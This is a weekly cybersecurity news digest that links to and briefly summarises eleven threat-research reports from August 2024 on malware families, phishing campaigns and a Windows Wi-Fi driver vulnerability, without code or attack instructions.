Cybersecurity Wiretap #18: From Xeon Sender to PEAKLIGHT & QWERTY with Focus on “WireServing” (week of 08/019/2024)

1.MoonPeak malware from North Korean actors unveils new details on attacker infrastructure by @TalosSecurity

  • campaign consists of distributing a variant of the open-source XenoRAT malware we’re calling “MoonPeak,” a remote access trojan (RAT) being active

https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/

2.Xeon Sender | SMS Spam Shipping Multi-Tool Targeting SaaS Credentials by @LabsSentinel

  • Python script that sends spam via 9 SaaS providers, has been repurposed by multiple threat actors branding tool as their own, common occurrence in cloud hacktool scene

https://www.sentinelone.com/labs/xeon-sender-sms-spam-shipping-multi-tool-targeting-saas-credentials/

3.Technical Analysis of Copybara by @Threatlabz

  • primarily spread through voice phishing (vishing) attacks, where victims receive instructions over the phone to install the Android malware

https://www.zscaler.com/blogs/security-research/technical-analysis-copybara

4.Bling Libra’s Tactical Evolution: The Threat Actor Group Behind ShinyHunters Ransomware by #PaloAlto‘s #Unit42

  • showcased new shift to extorting victims rather than their traditional tactic of selling/publishing stolen data

https://unit42.paloaltonetworks.com/shinyhunters-ransomware-extortion/

5.PEAKLIGHT: Decoding the Stealthy Memory-Only Malware by @Mandiant

  • new memory-only dropper using a complex, multi-stage infection process
  • decrypts and executes a PowerShell-based downloader

https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding-stealthy-memory-only-malware

6.”WireServing” Up Credentials: Escalating Privileges in Azure Kubernetes Services by @Mandiant

  • attacker with access to vulnerable MS Azure Kubernetes Services cluster could have escalated privileges & accessed creds for services used by the cluster. 

https://cloud.google.com/blog/topics/threat-intelligence/escalating-privileges-azure-kubernetes-services

7.NGate Android malware relays NFC traffic to steal cash by @ESETresearch

  • Attackers were able to clone NFC data from victims’ physical payment cards using NGate and relay this data to attacker device that was then able to emulate the original card

https://www.welivesecurity.com/en/eset-research/ngate-android-malware-relays-nfc-traffic-to-steal-cash/

8.Be careful what you pwish for – Phishing in PWA applications by @ESETresearch

  • standard phishing delivery combined with novel method of phishing; targeting Android and iOS users via PWAs
  • installing PWA/WebAPK does not warn about installing 3rd-party app

https://www.welivesecurity.com/en/eset-research/be-careful-what-you-pwish-for-phishing-in-pwa-applications/

9.A Comprehensive Analysis of Angry Stealer : Rage Stealer in a New Disguise by @CyfirmaR

  • 32-bit Win32 exe written in .NET, deploys 2 payloads
  • primary payload – potent data-stealing malware, targets sensitive info & exfils it via Telegram

https://www.cyfirma.com/research/a-comprehensive-analysis-of-angry-stealer-rage-stealer-in-a-new-disguise/

10.CVE-2024-30078 Remote Code Execution Vulnerability Analysis and Exploitation by @CyfirmaR

  • vuln in Wi-Fi drivers in multiple Win OS versions, potentially enabling attacker within the Wi-Fi range to remotely execute malicious code on susceptible systems

https://www.cyfirma.com/research/cve-2024-30078-remote-code-execution-vulnerability-analysis-and-exploitation/

11.QWERTY INFORMATION STEALER by @CyfirmaR

  • hosted on Linux-based VPS in Frankfurt,DE
  • gathers system info & IE data
  • downloads & executes additional payloads, indexes all files & uploads to C2 server
  • uses ‘qwerty’ in HTTP calls during exfiltration

https://www.cyfirma.com/research/qwerty-information-stealer/

Thanks a lot for reading.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.